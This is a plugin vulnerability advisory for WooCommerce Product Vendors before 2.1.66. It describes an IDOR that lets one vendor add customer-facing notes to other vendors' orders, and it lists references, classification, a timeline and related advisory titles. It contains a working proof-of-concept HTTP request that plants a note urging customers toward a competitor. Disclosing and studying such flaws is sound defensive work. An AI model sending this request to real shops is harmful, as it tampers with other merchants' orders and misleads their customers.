WooCommerce Products Vendor < 2.1.66 – Note Creation via IDOR | Plugin Vulnerabilities

Description

The plugin does not ensure that notes to be created on an order belongs to the vendor doing it, allowing any vendor to create arbitrary note on other vendors' orders via an IDOR

Proof of Concept

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 111
DNT: 1
Connection: close
Cookie: [vendor]

action=wc_product_vendors_vendor_add_order_note&post_id=22&note=our+products+are+inferior.+Try+COMPETITOR+instead&note_type=customer&security=97c621b714

Affects Plugins

woocommerce-product-vendors

Fixed in 2.1.66

References

URL

https://hackerone.com/reports/1709763

Classification

Type

IDOR

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

foobar7

Verified

Yes

WPVDB ID

23962f19-6e48-4435-8dca-7a9d3195c22a

Timeline

Publicly Published

2022-10-04 (about 3 years ago)

Added

2023-04-18 (about 3 years ago)

Last Updated

2023-04-18 (about 3 years ago)

Other

Published

Title

Published

2024-11-08

Title

Attesa Extra < 1.4.3 - Authenticated (Contributor+) Post Disclosure

Published

2024-04-15

Title

Login with phone number < 1.7.17 - Unauthorized Account Password Change to Privilege Escalation

Published

2026-02-09

Title

WCFM Membership – WooCommerce Memberships for Multivendor Marketplace < 2.11.9 - Insecure Direct Object Reference to Update Membership Payment

Published

2024-04-25

Title

Crelly Slider < 1.4.6 - Subscriber+ Insecure Direct Object Reference

Published

2024-10-25

Title

School Management System – WPSchoolPress < 2.2.11 - Insecure Direct Object Reference to Authenticated (Teacher+) Account Takeover/Privilege Escalation